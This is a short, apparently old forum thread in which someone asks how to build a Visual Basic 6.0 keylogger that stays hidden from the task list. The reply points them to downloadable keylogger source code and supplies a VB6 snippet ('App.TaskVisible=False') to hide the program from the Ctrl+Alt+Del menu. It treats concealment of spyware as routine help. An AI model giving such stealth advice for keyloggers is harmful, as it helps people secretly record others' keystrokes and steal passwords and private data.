QUOTE(Zubair1 @ Nov 14 2004, 04:23 AM)
Hi Pe

ple ,
Can Any One Tell me how to build a Keylogger on Visual Bais 6.0
that no one could see on the End Task Menu
There a lots of source code for key logger available on the net. www.planet-source-code.com offers variety of code wherein you can still modified the whole programs, but when you do so, just don't forget to give compliments to the author.
If the keylogger you have. Since you said no one can see it means you tried other program but case is visible in end task menu. If you have the source code for this program just add the code to disabled the program seing from the CTRL+ALT+DEL menu.
the code for this function shown below.
Private Sub Form_Load()
App.TaskVisible=False
End Sub
That's it... a very short code the will hide your program from the end task menu... Just call the function upon loading of program...
Hope this little text help you out...

Reply